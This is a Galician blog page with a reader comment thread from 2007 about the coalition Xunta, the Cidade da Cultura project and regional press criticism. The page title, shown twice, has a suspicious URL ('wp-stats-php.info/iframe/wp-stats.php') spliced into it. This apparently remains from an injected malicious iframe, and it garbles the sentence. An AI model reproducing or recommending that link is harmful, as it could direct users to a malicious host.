Etiquetas
A columna de EL PAÍS. O que avisa non http://www.wp-stats-php.info/iframe/wp-stats.php é traidor
22 Xoves Nov 2007
Posted El País
inEtiquetas
A columna de EL PAÍS. O que avisa non http://www.wp-stats-php.info/iframe/wp-stats.php é traidor
Já veremos se essas medidas nom acabam abortando-se. Mas o contraponto decepcionante está no nom cumprimento na promesa de reduzir cargos públicos, na Lei de Funçom Pública, na Cidade da Cultura, e em muitas outras questons onde a verdade o bipartido está longe de agir como governo de esquerdas…
A min o que me chama a atención e que antes o Sr. Touriño e mais o Sr. Quintana decían que a cidade da cultura era un despropósito e agora os dous din que é a chulada do mundo mundial…
Non entendo nada…
Home, unha contestación cínica sería que antes non eran nin o seu problema nin os seus cartos (os que tiñan que administrar eles, vamos), e agora si.
Unha realista é como se o pai che deixa un megachalé a medio facer, pero coas obras xa comprometidas. Se o rematas, os gastos de mantelo vante afogar, pero de non facelo, vaiche saír máis caro aínda. Podes reconducir cousas como quitarlle cuartos de baño ou camas con dosel, pero non moito máis. E non o podes vender.
Se ás consideracións de Tangaranho engadísmolle o culebrón do voto emigrante e o apoio a candidatos truchos nas eleccións municipais, os lindes do descontento vanse ir achegando ata facer fronteira. Velahí a necesidade das listas abertas para acadar dunha vez goberno de esquerdas realista e competente.
O que é noticia é o que marcha mal. Anque o Barcelona gañou 3-0 a noticia é a fatiga de Ronaldinho.
Aquí na Coruña o Bloque está facendoo moi ben. Metendo cousas pouco a pouco. Pero nen así. Onte coméntame unha amiga que Tello antes protestaba de todo e agora nada.
O que nos vá é criticar, o que nos vá é protestar.
O mellor informativo da Tele é o da 2ª -o menos sensacionalista, o que busca noticias máis positivas- e seguirá na 2ª, cambiando de horario a ver se o vé máis xente, porque un Informativo así a maioría non o ve.
Por máis cousas boas que faga o bipartito -e está facendo un montón, a política de benestar social é extraordinaria- seguirá sendo noticia o malo. Agora, se o o bipartito se empeña en facer as cousas que faría a dereita, está fodido o bipartito e estamos fodidos os que o apoiamos.
Ca Cidade da Cultura ten todo a favor. Obra absurda, gasto monumental, un Informe para meter na cárcere a Pérez Varela, a xente en contra. Ademais só hai un edificio case acabado e dous a medias. E nada nos outros dous. Nada. Perfectamente acaba os tres, e suspende os dous. E só ten que pagar, segundo a Lei de Administracións do Estado o 6 % da obra licitada e contratada. Pérdense uns 6 millóns de euros -1.000 millóns de pesetas- e aforranse uns 90 millóns de euros -15.000 millóns de pesetas-.
¿Por qué non o fai?. Non o sei. E non o entendo.
Dí Pereiro que o problema da Xunta está en que parece que está disposta a contentar aos amigos “económicos” do PP. Pode, pode ser.
O peor do pragmatismo non é só que mate as ideas. Mata tamén ás persoas con ideas.
Xa postos a positivos, apontar tamén o magnificamente ben que o están a facer,na miña opinión, os de Medio Rural no que atinxe a sectores produtivos. Ideas claras e vontade de planificar a longo prazo. Mágoa que non lles vai dar tempo: se non perde o bipartito, nas vindeiras isa é unha Consellería demasiado golosa para que o Psoe trague de novo….
Sobre este aspecto, nas declaracións de Camilo Nogueira a Dani Salgado en EL PAIS, que vén querendo dicir en concreto o de que son tamén de interese para os nacionalistas os aspectos da vida que deben administrar as consellerías gobernadas por socialistas, como a educación, a sanidade e o medio ambiente? Cales deberían ser as consecuencias prácticas desa consideración?
Consecuencias? Na práctica, ningunha, dada a correlación de forzas. O único que se conseguíu á hora da negociación foi a separación de Vivenda (e polo tanto o IGVS) de Política Territorial. Dende entón son as Consellerías do Psoe as que avanzan cara o terreo das do BNG. Véxase senon a creación, por parte da Conselleria de Medio Ambiente, dun organismo paralelo á Axencia Galega de Desenvolvemento Rural, “propiedade” de Medio Rural, sen que estes chistaran. É máis, os conflictos entre consellerías estanse a resolver, case sen excepcións, en favor das socialistas. É patente a debilidade da posición do bloque, e máis dados os resultados das municipais.
A nova Xunta estame a resultar deprimente non polo seu traballo,senon pola ruindade das criticas que esta a recibir.Se os criticos foran unha boa mostra do material humano galego,Galiza deberia estar entre a Nova Orleans de Bush e a Uganda de Idi Amin.
Non deberiamos de esquecer que a actual ideoloxia do partido con mais aceptacion do pais,liberada xa de autoidentificacions e demais andromenas,fai que os galegos sexan indixenas e non cidadans(Prestige,Estatuto,ensino en galego,etc).Malia estes perigos ambientais e a inexistencia dos paraisos(tamen dos artificiais),a xente ten que lle esixir mais o Goberno,sen dubida.Pero cando un colle os xornais galegos tende a pensar que os criticos estan baleiros de ideas ou son bastante miserables.Pareceme normal que moitos queiran entrar na Xunta e mesmo figurar na caixa dos
mistos.Tamen que se consideren mais guapos e mais listos que Losada.O primeiro,vendo as fotos,parece bastante posible.O segundo,lendo os artigos,xa non tanto.
E se falamos da Cidade da Cultura,a data de 2008,coido que deberia ser unha ferramenta para superar o autoodio e o localismo,ainda que alguns queiran utilizala para o contrario.
Alfonso, ¿pode facer unha lista completa de temas de interese cidadán sobre os que deberiamos renunciar a falar polo ben do futuro do actual goberno? Outra cousa, cando fala de localismos e autoodio, ¿refírese a todos estes composteláns que tamén alucinan co potzlach da CdC?
Vendell,nonHomenon,se eiqui somos un grupiño de amighos e por moito que berremos non se oe fora.E o falar non ten cancelas e falando se entende a xente ou alomenos imos matando o tempo.Eu non me referia a vostede nin a membro ningun do pequeno club dos caseiros virtuais de sHs.
Eu referiame a xente a que lle pagan bos cartiños por escribir e que publican artigos en follas que se venden ben e lense no bar,un cando vai mirar as esquelas e o outro cando vai ver como quedou o Depor.Seica os chaman creadores de opinion.Como se os chaman X.
O problema non e que critiquen.O problema e precisamente que ese tipo de criticos non fan a lista de cousas a mellorar,nin din en que consistirian as melloras.Eles din que a Xunta e fea e non lle piden nada,cando todo o mundo sabe que o que hai que facer e dicir cousas bonitas e ir pedindo para que as cousas vaian indo.Bueno,o que non piden e nada de accion publica ou proxecto social.Disque eses criticos son moi pedichons,sempre en privado e con finalidade particular.
E localismos e autoodio non e outra cousa,ven sendo o mesmo.Referiame outravolta a persoas que teñen certo poder de comunicacion e xogan a esa carta,por exemplo La Voz de Galicia.Digollo eu,que son coruñes e coruñesista(na acepcion non fascista do termo) e ,sabendo que o señor e de Monforte e os caseiros mais importantes de Vigo e arredores,sintome abafado pola maioria sudista de sHs.Iso non fai que non me alegre do que se faga en Vigo,Compostela e polo mundo adiante.Ou que estea de acordo coa Voz e pense que o porto exterior coruñes e unha obra moi util e bonita e a CdC o contrario.En gustos non paga a pena entrar porque eu teño moi mal ghusto,e ainda por riba estoume a quedar sen licor cafe.
Oiga, que eiquí servidor é veciño de Santa Crus, pagha o IVE en Curuña e cando vai a Vigo alucina do mal que conducen eses vigheses do carallo, por máis que nascera na rua urzaiz e teña a desgracia de ser do celta. E, como bon centrista liberal, direille que a CdC cada vez paréceseme máis a un boneco de Tyranosaurus Rex que tiña un dos meus fillos e que o chafou un coche. Ou sexa, que aínda por riba, feo de pelotas……
Sr.Pardo: anímese que os paraisos artificias estan moi ben ainda que duren pouco, cada vez esten mais caros e mais dificiles de conseguir.
Sr. eSedidió parece mentira en vostede, os vijeses non conducimos mal, o que pasa e que practicamos a condución ajresiva e iso é un “concepto”, o que pasa que como pasa tempo nesas terrar do noroeste pois claro, un amolece….
Ah, pero en paraísos artificiais, nada como Marina Dor.
Por favor,señores,que vou ter que chamar a Brighada Antivicio e a Brighada Antiespeculacion Inmobiliaria.Señor Alvarez,iso de ser de Vigho dalle moitos privilexios,pero non todos.E lembre que Baudelaire,o moi rabudo,remataba por non os aconsellar.